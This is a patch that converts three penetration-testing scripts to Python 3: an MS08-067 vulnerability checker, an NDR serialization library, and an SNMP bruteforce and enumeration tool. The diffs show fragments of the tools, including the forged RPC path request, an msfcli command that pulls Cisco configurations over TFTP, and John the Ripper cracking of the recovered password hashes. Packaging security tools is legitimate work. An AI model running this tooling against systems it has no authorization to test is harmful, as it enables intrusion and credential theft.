|
0 |
From: Sophie Brun <[email protected]>
|
|
1 |
Date: Tue, 17 Sep 2019 12:01:32 +0200
|
|
2 |
Subject: Switch to Python 3
|
|
3 |
|
|
4 |
Last-update: 2019-09-17
|
|
5 |
Description: use 2to3 to convert the scripts for Python3.
|
|
6 |
---
|
|
7 |
ms08-067_check.py | 70 +++++++++++++++----------------
|
|
8 |
ndr.py | 38 ++++++++---------
|
|
9 |
snmpbrute.py | 120 +++++++++++++++++++++++++++---------------------------
|
|
10 |
3 files changed, 114 insertions(+), 114 deletions(-)
|
|
11 |
|
|
12 |
diff --git a/ms08-067_check.py b/ms08-067_check.py
|
|
13 |
index f2b0281..414f345 100644
|
|
14 |
--- a/ms08-067_check.py
|
|
15 |
+++ b/ms08-067_check.py
|
|
16 |
@@ -1,4 +1,4 @@
|
|
17 |
-#!/usr/bin/env python
|
|
18 |
+#!/usr/bin/env python3
|
|
19 |
|
|
20 |
'''
|
|
21 |
Name: Microsoft Server Service Remote Path Canonicalization Stack Overflow Vulnerability
|
|
22 |
@@ -53,16 +53,16 @@ try:
|
|
23 |
from impacket import uuid
|
|
24 |
from impacket.dcerpc.v5 import dcerpc
|
|
25 |
from impacket.dcerpc.v5 import transport
|
|
26 |
-except ImportError, _:
|
|
27 |
- print 'ERROR: this tool requires python-impacket library to be installed, get it '
|
|
28 |
- print 'from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket'
|
|
29 |
+except ImportError as _:
|
|
30 |
+ print('ERROR: this tool requires python-impacket library to be installed, get it ')
|
|
31 |
+ print('from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket')
|
|
32 |
sys.exit(1)
|
|
33 |
|
|
34 |
try:
|
|
35 |
from ndr import *
|
|
36 |
-except ImportError, _:
|
|
37 |
- print 'ERROR: this tool requires python-pymsrpc library to be installed, get it '
|
|
38 |
- print 'from http://code.google.com/p/pymsrpc/'
|
|
39 |
+except ImportError as _:
|
|
40 |
+ print('ERROR: this tool requires python-pymsrpc library to be installed, get it ')
|
|
41 |
+ print('from http://code.google.com/p/pymsrpc/')
|
|
42 |
sys.exit(1)
|
|
43 |
|
|
44 |
|
|
45 |
@@ -94,11 +94,11 @@ class MS08_067(Thread):
|
|
46 |
s.connect((self.target, self.__port))
|
|
47 |
s.close()
|
|
48 |
|
|
49 |
- except socket.timeout, _:
|
|
50 |
- raise connectionException, 'connection timeout'
|
|
51 |
+ except socket.timeout as _:
|
|
52 |
+ raise connectionException('connection timeout')
|
|
53 |
|
|
54 |
- except socket.error, _:
|
|
55 |
- raise connectionException, 'connection refused'
|
|
56 |
+ except socket.error as _:
|
|
57 |
+ raise connectionException('connection refused')
|
|
58 |
|
|
59 |
|
|
60 |
def __connect(self):
|
|
61 |
@@ -111,12 +111,12 @@ class MS08_067(Thread):
|
|
62 |
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
|
|
63 |
self.__trans.connect()
|
|
64 |
|
|
65 |
- except smb.SessionError, _:
|
|
66 |
- raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'
|
|
67 |
+ except smb.SessionError as _:
|
|
68 |
+ raise connectionException('access denied (RestrictAnonymous is probably set to 2)')
|
|
69 |
|
|
70 |
except:
|
|
71 |
#raise Exception, 'unhandled exception (%s)' % format_exc()
|
|
72 |
- raise connectionException, 'unexpected exception'
|
|
73 |
+ raise connectionException('unexpected exception')
|
|
74 |
|
|
75 |
|
|
76 |
def __bind(self):
|
|
77 |
@@ -130,12 +130,12 @@ class MS08_067(Thread):
|
|
78 |
|
|
79 |
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
|
|
80 |
|
|
81 |
- except socket.error, _:
|
|
82 |
- raise connectionException, 'unable to bind to SRVSVC endpoint'
|
|
83 |
+ except socket.error as _:
|
|
84 |
+ raise connectionException('unable to bind to SRVSVC endpoint')
|
|
85 |
|
|
86 |
except:
|
|
87 |
#raise Exception, 'unhandled exception (%s)' % format_exc()
|
|
88 |
- raise connectionException, 'unexpected exception'
|
|
89 |
+ raise connectionException('unexpected exception')
|
|
90 |
|
|
91 |
|
|
92 |
def __forgePacket(self):
|
|
93 |
@@ -153,7 +153,7 @@ class MS08_067(Thread):
|
|
94 |
);
|
|
95 |
'''
|
|
96 |
|
|
97 |
- self.__path = ''.join([choice(letters) for _ in xrange(0, 3)])
|
|
98 |
+ self.__path = ''.join([choice(letters) for _ in range(0, 3)])
|
|
99 |
|
|
100 |
self.__request = ndr_unique(pointer_value=0x00020000, data=ndr_wstring(data='')).serialize()
|
|
101 |
self.__request += ndr_wstring(data='\\%s\\..\\%s' % ('A'*5, self.__path)).serialize()
|
|
102 |
@@ -182,9 +182,9 @@ class MS08_067(Thread):
|
|
103 |
|
|
104 |
def result(self):
|
|
105 |
if CMDLINE == True and self.status in ('VULNERABLE', 'not vulnerable'):
|
|
106 |
- print '%s: %s' % (self.target, self.status)
|
|
107 |
+ print('%s: %s' % (self.target, self.status))
|
|
108 |
elif CMDLINE == True and SILENT != True:
|
|
109 |
- print '%s: %s' % (self.target, self.status)
|
|
110 |
+ print('%s: %s' % (self.target, self.status))
|
|
111 |
|
|
112 |
|
|
113 |
def run(self):
|
|
114 |
@@ -192,7 +192,7 @@ class MS08_067(Thread):
|
|
115 |
self.__checkPort()
|
|
116 |
self.__connect()
|
|
117 |
self.__bind()
|
|
118 |
- except connectionException, e:
|
|
119 |
+ except connectionException as e:
|
|
120 |
self.status = e
|
|
121 |
self.result()
|
|
122 |
return None
|
|
123 |
@@ -226,10 +226,10 @@ if __name__ == '__main__':
|
|
124 |
(args, _) = parser.parse_args()
|
|
125 |
|
|
126 |
if not args.descr and not args.target and not args.list:
|
|
127 |
- print usage
|
|
128 |
+ print(usage)
|
|
129 |
sys.exit(1)
|
|
130 |
|
|
131 |
- except (OptionError, TypeError), e:
|
|
132 |
+ except (OptionError, TypeError) as e:
|
|
133 |
parser.error(e)
|
|
134 |
|
|
135 |
descr = args.descr
|
|
136 |
@@ -239,14 +239,14 @@ if __name__ == '__main__':
|
|
137 |
SILENT = args.silent
|
|
138 |
|
|
139 |
if descr:
|
|
140 |
- print __doc__
|
|
141 |
+ print(__doc__)
|
|
142 |
sys.exit(0)
|
|
143 |
|
|
144 |
if tList:
|
|
145 |
try:
|
|
146 |
fd = open(tList, 'r')
|
|
147 |
except IOError:
|
|
148 |
- print 'ERROR: unable to read targets list file \'%s\'' % tList
|
|
149 |
+ print('ERROR: unable to read targets list file \'%s\'' % tList)
|
|
150 |
sys.exit(1)
|
|
151 |
|
|
152 |
for line in fd.readlines():
|
|
153 |
@@ -256,22 +256,22 @@ if __name__ == '__main__':
|
|
154 |
targets.add(target)
|
|
155 |
|
|
156 |
if not targets:
|
|
157 |
- print 'ERROR: no targets specified'
|
|
158 |
+ print('ERROR: no targets specified')
|
|
159 |
sys.exit(1)
|
|
160 |
|
|
161 |
targets = list(targets)
|
|
162 |
targets.sort()
|
|
163 |
|
|
164 |
if not SILENT:
|
|
165 |
- print
|
|
166 |
- print '***********************************************************************'
|
|
167 |
- print '* On Windows XP SP2 and SP3 this check might lead to a race condition *'
|
|
168 |
- print '* and heap corruption in the svchost.exe process, but it may not *'
|
|
169 |
- print '* crash the service immediately, it can trigger later on inside any *'
|
|
170 |
- print '* of the shared services in the process. *'
|
|
171 |
- print '***********************************************************************'
|
|
172 |
- print
|
|
173 |
- answer = raw_input('Do you want to continue? [Y/n] ')
|
|
174 |
+ print()
|
|
175 |
+ print('***********************************************************************')
|
|
176 |
+ print('* On Windows XP SP2 and SP3 this check might lead to a race condition *')
|
|
177 |
+ print('* and heap corruption in the svchost.exe process, but it may not *')
|
|
178 |
+ print('* crash the service immediately, it can trigger later on inside any *')
|
|
179 |
+ print('* of the shared services in the process. *')
|
|
180 |
+ print('***********************************************************************')
|
|
181 |
+ print()
|
|
182 |
+ answer = input('Do you want to continue? [Y/n] ')
|
|
183 |
|
|
184 |
if answer and answer[0].lower() != 'y':
|
|
185 |
sys.exit(1)
|
|
186 |
diff --git a/ndr.py b/ndr.py
|
|
187 |
index 7d13bf9..9e8620b 100644
|
|
188 |
--- a/ndr.py
|
|
189 |
+++ b/ndr.py
|
|
190 |
@@ -1,4 +1,4 @@
|
|
191 |
-#!/usr/bin/env python
|
|
192 |
+#!/usr/bin/env python3
|
|
193 |
|
|
194 |
'''
|
|
195 |
This file is part of the PyMSRPC project and is licensed under the
|
|
196 |
@@ -72,23 +72,23 @@ class ndr_container(object):
|
|
197 |
return self.align_byte * ((4 - (len(data) & 3)) & 3)
|
|
198 |
|
|
199 |
def add_static(self, obj):
|
|
200 |
- if DEBUG: print "[*] add_static",
|
|
201 |
+ if DEBUG: print("[*] add_static", end=' ')
|
|
202 |
|
|
203 |
if not self.parent:
|
|
204 |
- if DEBUG: print "self"
|
|
205 |
+ if DEBUG: print("self")
|
|
206 |
self.s.append(obj)
|
|
207 |
else:
|
|
208 |
- if DEBUG: print "parent"
|
|
209 |
+ if DEBUG: print("parent")
|
|
210 |
self.parent.add_static(obj)
|
|
211 |
|
|
212 |
def add_deferred(self, obj):
|
|
213 |
- if DEBUG: print "[*] add_deferred",
|
|
214 |
+ if DEBUG: print("[*] add_deferred", end=' ')
|
|
215 |
|
|
216 |
if not self.parent:
|
|
217 |
- if DEBUG: print "self"
|
|
218 |
+ if DEBUG: print("self")
|
|
219 |
self.d.append(obj)
|
|
220 |
else:
|
|
221 |
- if DEBUG: print "parent"
|
|
222 |
+ if DEBUG: print("parent")
|
|
223 |
self.parent.add_deferred(obj)
|
|
224 |
|
|
225 |
def serialize(self):
|
|
226 |
@@ -795,14 +795,14 @@ class ndr_union:
|
|
227 |
serialdata = ""
|
|
228 |
|
|
229 |
switch = self.switch_dep.get_data()
|
|
230 |
- if self.elements.has_key(switch):
|
|
231 |
+ if switch in self.elements:
|
|
232 |
serialdata += self.switch_dep.serialize()
|
|
233 |
|
|
234 |
# Pack our requested enum
|
|
235 |
serialdata += self.elements[switch].serialize()
|
|
236 |
else:
|
|
237 |
# This allows us to pick a switch for the user
|
|
238 |
- newswitch = self.elements.keys()[0]
|
|
239 |
+ newswitch = list(self.elements.keys())[0]
|
|
240 |
|
|
241 |
# We need to update our original switch_dep so it passes correlation checks
|
|
242 |
self.switch_dep.set_data(newswitch)
|
|
243 |
@@ -973,7 +973,7 @@ class ndr_struct(ndr_container):
|
|
244 |
if element.name == name:
|
|
245 |
return element
|
|
246 |
except:
|
|
247 |
- if DEBUG: print "[*] Couldnt get name of element"
|
|
248 |
+ if DEBUG: print("[*] Couldnt get name of element")
|
|
249 |
|
|
250 |
return False
|
|
251 |
|
|
252 |
@@ -984,7 +984,7 @@ class ndr_struct(ndr_container):
|
|
253 |
return self.size
|
|
254 |
|
|
255 |
def serialize(self):
|
|
256 |
- if DEBUG: print "[*] Serializing ndr_struct"
|
|
257 |
+ if DEBUG: print("[*] Serializing ndr_struct")
|
|
258 |
|
|
259 |
# First we take care of our list serializing all containers first, and adding primitives verbatim
|
|
260 |
for e in self.elements:
|
|
261 |
@@ -996,7 +996,7 @@ class ndr_struct(ndr_container):
|
|
262 |
|
|
263 |
# If we are the top-most structure lets package it all
|
|
264 |
if not self.parent:
|
|
265 |
- if DEBUG: print "[*] Packaging top most struct %s" % self.name
|
|
266 |
+ if DEBUG: print("[*] Packaging top most struct %s" % self.name)
|
|
267 |
|
|
268 |
self.add_static(ndr_pad())
|
|
269 |
|
|
270 |
@@ -1036,7 +1036,7 @@ class ndr_array(ndr_container):
|
|
271 |
self.add_static(self.basetype)
|
|
272 |
|
|
273 |
if not self.parent:
|
|
274 |
- if DEBUG: print "[*] Packaging top most array %s" % self.name
|
|
275 |
+ if DEBUG: print("[*] Packaging top most array %s" % self.name)
|
|
276 |
|
|
277 |
while len(self.d):
|
|
278 |
d = self.d.pop(0)
|
|
279 |
@@ -1086,7 +1086,7 @@ class ndr_array_fixed(ndr_array):
|
|
280 |
return self.count
|
|
281 |
|
|
282 |
def serialize(self):
|
|
283 |
- if DEBUG: print "[*] Serializing ndr_array"
|
|
284 |
+ if DEBUG: print("[*] Serializing ndr_array")
|
|
285 |
|
|
286 |
if self.cptr == 1:
|
|
287 |
self.add_static(ndr_long(data=0x41424344))
|
|
288 |
@@ -1117,7 +1117,7 @@ class ndr_array_conformant(ndr_array):
|
|
289 |
return self.size
|
|
290 |
|
|
291 |
def serialize(self):
|
|
292 |
- if DEBUG: print "[*] Serializing ndr_array_conformant"
|
|
293 |
+ if DEBUG: print("[*] Serializing ndr_array_conformant")
|
|
294 |
|
|
295 |
if self.cptr == 1:
|
|
296 |
self.add_static(ndr_long(data=0x41424344))
|
|
297 |
@@ -1144,7 +1144,7 @@ class ndr_array_conformant(ndr_array):
|
|
298 |
elif self.cmod[0] == "*":
|
|
299 |
num *= self.cmod[1]
|
|
300 |
else:
|
|
301 |
- print "[!] Problem with operator %s" % self.cmod[0]
|
|
302 |
+ print("[!] Problem with operator %s" % self.cmod[0])
|
|
303 |
sys.exit(-1)
|
|
304 |
|
|
305 |
self.add_static(ndr_long(data=num))
|
|
306 |
@@ -1196,7 +1196,7 @@ class ndr_array_varying(ndr_array):
|
|
307 |
elif self.cmod[0] == "*":
|
|
308 |
num *= self.cmod[1]
|
|
309 |
else:
|
|
310 |
- print "[!] Problem with operator %s" % self.cmod[0]
|
|
311 |
+ print("[!] Problem with operator %s" % self.cmod[0])
|
|
312 |
sys.exit(-1)
|
|
313 |
|
|
314 |
# Pack our array count
|
|
315 |
@@ -1252,7 +1252,7 @@ class ndr_array_conformant_varying(ndr_array):
|
|
316 |
elif self.mmod[0] == "*":
|
|
317 |
mnum *= self.mmod[1]
|
|
318 |
else:
|
|
319 |
- print "[!] Problem with operator %s" % self.mmod[0]
|
|
320 |
+ print("[!] Problem with operator %s" % self.mmod[0])
|
|
321 |
sys.exit(-1)
|
|
322 |
|
|
323 |
# Pack conformant info
|
|
324 |
@@ -1278,7 +1278,7 @@ class ndr_array_conformant_varying(ndr_array):
|
|
325 |
elif self.pmod[0] == "*":
|
|
326 |
pnum *= self.pmod[1]
|
|
327 |
else:
|
|
328 |
- print "[!] Problem with operator %s" % self.pmod[0]
|
|
329 |
+ print("[!] Problem with operator %s" % self.pmod[0])
|
|
330 |
sys.exit(-1)
|
|
331 |
|
|
332 |
# Add varying count
|
|
333 |
diff --git a/snmpbrute.py b/snmpbrute.py
|
|
334 |
index 3e13709..f7d58d0 100644
|
|
335 |
--- a/snmpbrute.py
|
|
336 |
+++ b/snmpbrute.py
|
|
337 |
@@ -1,4 +1,4 @@
|
|
338 |
-#!/usr/bin/env python
|
|
339 |
+#!/usr/bin/env python3
|
|
340 |
# SNMP Bruteforce & Enumeration Script
|
|
341 |
# Requires metasploit, snmpwalk, snmpstat and john the ripper
|
|
342 |
__version__ = 'v1.0b'
|
|
343 |
@@ -8,7 +8,7 @@ from time import sleep
|
|
344 |
import optparse, sys, os
|
|
345 |
from subprocess import Popen, PIPE
|
|
346 |
import struct
|
|
347 |
-import threading, thread
|
|
348 |
+import threading, _thread
|
|
349 |
import tempfile
|
|
350 |
|
|
351 |
from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
|
|
352 |
@@ -219,7 +219,7 @@ class SNMPResults:
|
|
353 |
##########################################################################################################
|
|
354 |
|
|
355 |
# for color output
|
|
356 |
-BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
|
|
357 |
+BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
|
|
358 |
|
|
359 |
#following from Python cookbook, #475186
|
|
360 |
def has_colours(stream):
|
|
361 |
@@ -243,7 +243,7 @@ def printout(text, colour=WHITE):
|
|
362 |
sys.stdout.write(seq)
|
|
363 |
else:
|
|
364 |
#sys.stdout.write(text)
|
|
365 |
- print text
|
|
366 |
+ print(text)
|
|
367 |
|
|
368 |
|
|
369 |
##########################################################################################################
|
|
370 |
@@ -252,16 +252,16 @@ def printout(text, colour=WHITE):
|
|
371 |
|
|
372 |
def banner(art=True):
|
|
373 |
if art:
|
|
374 |
- print >> sys.stderr, " _____ _ ____ _______ ____ __ "
|
|
375 |
- print >> sys.stderr, " / ___// | / / |/ / __ \\ / __ )_______ __/ /____ "
|
|
376 |
- print >> sys.stderr, " \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\"
|
|
377 |
- print >> sys.stderr, " ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/"
|
|
378 |
- print >> sys.stderr, "/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ "
|
|
379 |
- print >> sys.stderr, ""
|
|
380 |
- print >> sys.stderr, "SNMP Bruteforce & Enumeration Script " + __version__
|
|
381 |
- print >> sys.stderr, "http://www.secforce.com / nikos.vassakis <at> secforce.com"
|
|
382 |
- print >> sys.stderr, "###############################################################"
|
|
383 |
- print >> sys.stderr, ""
|
|
384 |
+ print(" _____ _ ____ _______ ____ __ ", file=sys.stderr)
|
|
385 |
+ print(" / ___// | / / |/ / __ \\ / __ )_______ __/ /____ ", file=sys.stderr)
|
|
386 |
+ print(" \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\", file=sys.stderr)
|
|
387 |
+ print(" ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/", file=sys.stderr)
|
|
388 |
+ print("/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ ", file=sys.stderr)
|
|
389 |
+ print("", file=sys.stderr)
|
|
390 |
+ print("SNMP Bruteforce & Enumeration Script " + __version__, file=sys.stderr)
|
|
391 |
+ print("http://www.secforce.com / nikos.vassakis <at> secforce.com", file=sys.stderr)
|
|
392 |
+ print("###############################################################", file=sys.stderr)
|
|
393 |
+ print("", file=sys.stderr)
|
|
394 |
|
|
395 |
def listener(sock,results):
|
|
396 |
while True:
|
|
397 |
@@ -363,17 +363,17 @@ def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
|
|
398 |
continue
|
|
399 |
|
|
400 |
def generic_snmpwalk(snmpwalk_args,oids):
|
|
401 |
- for key, val in oids.items():
|
|
402 |
+ for key, val in list(oids.items()):
|
|
403 |
try:
|
|
404 |
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
|
|
405 |
entry={}
|
|
406 |
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
|
|
407 |
|
|
408 |
- print '\tINFO'
|
|
409 |
- print '\t----\t'
|
|
410 |
+ print('\tINFO')
|
|
411 |
+ print('\t----\t')
|
|
412 |
for i in out:
|
|
413 |
- print '\t',i.strip()
|
|
414 |
- print '\n'
|
|
415 |
+ print('\t',i.strip())
|
|
416 |
+ print('\n')
|
|
417 |
except KeyboardInterrupt:
|
|
418 |
pass
|
|
419 |
|
|
420 |
@@ -400,17 +400,17 @@ def enumerateSNMPWalk(result,options):
|
|
421 |
|
|
422 |
printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
|
|
423 |
try:
|
|
424 |
- for key, val in RouteOIDS.items(): #Enumerate Routes
|
|
425 |
+ for key, val in list(RouteOIDS.items()): #Enumerate Routes
|
|
426 |
#print '\t *',val[1], val[0]
|
|
427 |
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
|
|
428 |
|
|
429 |
entry[val[1]]=out
|
|
430 |
|
|
431 |
|
|
432 |
- print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
|
|
433 |
- print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
|
|
434 |
+ print('\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge')
|
|
435 |
+ print('\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---')
|
|
436 |
for j in range(lines):
|
|
437 |
- print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
|
|
438 |
+ print(( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
|
|
439 |
'\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
|
|
440 |
'\t'+entry['Mask'][j].strip().ljust(12,' ') +
|
|
441 |
'\t\t'+entry['Metric'][j].strip().center(6,' ') +
|
|
442 |
@@ -418,13 +418,13 @@ def enumerateSNMPWalk(result,options):
|
|
443 |
'\t'+entry['Route type'][j].strip().center(4,' ') +
|
|
444 |
'\t'+entry['Route protocol'][j].strip().center(8,' ') +
|
|
445 |
'\t'+entry['Route age'][j].strip().center(3,' ')
|
|
446 |
- )
|
|
447 |
+ ))
|
|
448 |
except KeyboardInterrupt:
|
|
449 |
pass
|
|
450 |
|
|
451 |
############################################################### Enumerate Arp
|
|
452 |
- print '\n'
|
|
453 |
- for key, val in ARPOIDS.items():
|
|
454 |
+ print('\n')
|
|
455 |
+ for key, val in list(ARPOIDS.items()):
|
|
456 |
try:
|
|
457 |
printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
|
|
458 |
entry={}
|
|
459 |
@@ -437,40 +437,40 @@ def enumerateSNMPWalk(result,options):
|
|
460 |
entry['IP']=out[2*lines:3*lines]
|
|
461 |
|
|
462 |
|
|
463 |
- print '\tIP\t\tMAC\t\t\tV'
|
|
464 |
- print '\t--\t\t---\t\t\t--'
|
|
465 |
+ print('\tIP\t\tMAC\t\t\tV')
|
|
466 |
+ print('\t--\t\t---\t\t\t--')
|
|
467 |
for j in range(lines):
|
|
468 |
- print( '\t'+entry['IP'][j].strip().ljust(12,' ') +
|
|
469 |
+ print(( '\t'+entry['IP'][j].strip().ljust(12,' ') +
|
|
470 |
'\t'+entry['MAC'][j].strip().ljust(18,' ') +
|
|
471 |
'\t'+entry['V'][j].strip().ljust(2,' ')
|
|
472 |
- )
|
|
473 |
- print '\n'
|
|
474 |
+ ))
|
|
475 |
+ print('\n')
|
|
476 |
except KeyboardInterrupt:
|
|
477 |
pass
|
|
478 |
|
|
479 |
############################################################### Enumerate SYSTEM
|
|
480 |
- for key, val in OIDS.items():
|
|
481 |
+ for key, val in list(OIDS.items()):
|
|
482 |
try:
|
|
483 |
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
|
|
484 |
entry={}
|
|
485 |
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
|
|
486 |
|
|
487 |
- print '\tINFO'
|
|
488 |
- print '\t----\t'
|
|
489 |
+ print('\tINFO')
|
|
490 |
+ print('\t----\t')
|
|
491 |
for i in out:
|
|
492 |
- print '\t',i.strip()
|
|
493 |
- print '\n'
|
|
494 |
+ print('\t',i.strip())
|
|
495 |
+ print('\n')
|
|
496 |
except KeyboardInterrupt:
|
|
497 |
pass
|
|
498 |
############################################################### Enumerate Interfaces
|
|
499 |
- for key, val in snmpstat_args.items():
|
|
500 |
+ for key, val in list(snmpstat_args.items()):
|
|
501 |
try:
|
|
502 |
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
|
|
503 |
out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
|
|
504 |
|
|
505 |
for i in out:
|
|
506 |
- print '\t',i.strip()
|
|
507 |
- print '\n'
|
|
508 |
+ print('\t',i.strip())
|
|
509 |
+ print('\n')
|
|
510 |
except KeyboardInterrupt:
|
|
511 |
pass
|
|
512 |
|
|
513 |
@@ -480,7 +480,7 @@ def get_cisco_config(result,options):
|
|
514 |
identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
|
|
515 |
|
|
516 |
if options.interactive:
|
|
517 |
- Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
|
|
518 |
+ Local_ip = input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
|
|
519 |
else:
|
|
520 |
Local_ip = identified_ip.strip()
|
|
521 |
|
|
522 |
@@ -490,26 +490,26 @@ def get_cisco_config(result,options):
|
|
523 |
p=Popen('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
|
|
524 |
|
|
525 |
|
|
526 |
- print 'msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E '
|
|
527 |
+ print('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ')
|
|
528 |
|
|
529 |
out=[]
|
|
530 |
while p.poll() is None:
|
|
531 |
line=p.stdout.readline()
|
|
532 |
out.append(line)
|
|
533 |
- print '\t',line.strip()
|
|
534 |
+ print('\t',line.strip())
|
|
535 |
|
|
536 |
printout('################## Passwords Found:',YELLOW)
|
|
537 |
encrypted=[]
|
|
538 |
for i in out:
|
|
539 |
if "Password" in i:
|
|
540 |
- print '\t',i.strip()
|
|
541 |
+ print('\t',i.strip())
|
|
542 |
if "Encrypted" in i:
|
|
543 |
encrypted.append(i.split()[-1])
|
|
544 |
|
|
545 |
if encrypted:
|
|
546 |
- print '\nCrack encrypted password(s)?'
|
|
547 |
+ print('\nCrack encrypted password(s)?')
|
|
548 |
for i in encrypted:
|
|
549 |
- print '\t',i
|
|
550 |
+ print('\t',i)
|
|
551 |
|
|
552 |
#if (False if raw_input("(Y/n):").lower() == 'n' else True):
|
|
553 |
if not get_input("(Y/n):",'n',options):
|
|
554 |
@@ -520,17 +520,17 @@ def get_cisco_config(result,options):
|
|
555 |
|
|
556 |
p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
|
|
557 |
while p.poll() is None:
|
|
558 |
- print '\t',p.stdout.readline()
|
|
559 |
- print 'Passwords Cracked:'
|
|
560 |
+ print('\t',p.stdout.readline())
|
|
561 |
+ print('Passwords Cracked:')
|
|
562 |
out=os.popen('john ./hashes --show').readlines()
|
|
563 |
for i in out:
|
|
564 |
- print '\t', i.strip()
|
|
565 |
+ print('\t', i.strip())
|
|
566 |
|
|
567 |
out=[]
|
|
568 |
while p.poll() is None:
|
|
569 |
line=p.stdout.readline()
|
|
570 |
out.append(line)
|
|
571 |
- print '\t',line.strip()
|
|
572 |
+ print('\t',line.strip())
|
|
573 |
|
|
574 |
def select_community(results,options):
|
|
575 |
default=None
|
|
576 |
@@ -553,7 +553,7 @@ def select_community(results,options):
|
|
577 |
return
|
|
578 |
|
|
579 |
if options.interactive:
|
|
580 |
- selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
|
|
581 |
+ selection=input("Select Community to Enumerate ["+str(default)+"]:")
|
|
582 |
if not selection:
|
|
583 |
selection=default
|
|
584 |
else:
|
|
585 |
@@ -578,7 +578,7 @@ def SNMPenumeration(result,options):
|
|
586 |
if getcisco:
|
|
587 |
get_cisco_config(result,options)
|
|
588 |
except KeyboardInterrupt:
|
|
589 |
- print '\n'
|
|
590 |
+ print('\n')
|
|
591 |
return
|
|
592 |
|
|
593 |
def password_brutefore(options, communities, ips):
|
|
594 |
@@ -615,7 +615,7 @@ def password_brutefore(options, communities, ips):
|
|
595 |
while True:
|
|
596 |
try:
|
|
597 |
try:
|
|
598 |
- community=raw_input().strip('\n')
|
|
599 |
+ community=input().strip('\n')
|
|
600 |
for ip in ips:
|
|
601 |
SNMPsend(s, packets, ip, options.port, community, options.rate)
|
|
602 |
except EOFError:
|
|
603 |
@@ -624,7 +624,7 @@ def password_brutefore(options, communities, ips):
|
|
604 |
break
|
|
605 |
|
|
606 |
try:
|
|
607 |
- print "Waiting for late packets (CTRL+C to stop)"
|
|
608 |
+ print("Waiting for late packets (CTRL+C to stop)")
|
|
609 |
sleep(options.timeOut+options.delay) #Waiting in case of late response
|
|
610 |
except KeyboardInterrupt:
|
|
611 |
pass
|
|
612 |
@@ -642,12 +642,12 @@ def get_input(string,non_default_option,options):
|
|
613 |
#(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
|
|
614 |
|
|
615 |
if options.interactive:
|
|
616 |
- if raw_input(string).lower() == non_default_option:
|
|
617 |
+ if input(string).lower() == non_default_option:
|
|
618 |
return True
|
|
619 |
else:
|
|
620 |
return False
|
|
621 |
else:
|
|
622 |
- print string
|
|
623 |
+ print(string)
|
|
624 |
return False
|
|
625 |
|
|
626 |
def main():
|
|
627 |
@@ -708,7 +708,7 @@ def main():
|
|
628 |
with open(options.lfile) as t:
|
|
629 |
ips = t.read().splitlines() #Potential DoS
|
|
630 |
except:
|
|
631 |
- print "Could not open targets file: " + options.lfile
|
|
632 |
+ print("Could not open targets file: " + options.lfile)
|
|
633 |
exit(0)
|
|
634 |
else:
|
|
635 |
ips.append(options.ip)
|
|
636 |
@@ -739,9 +739,9 @@ def main():
|
|
637 |
results=[]
|
|
638 |
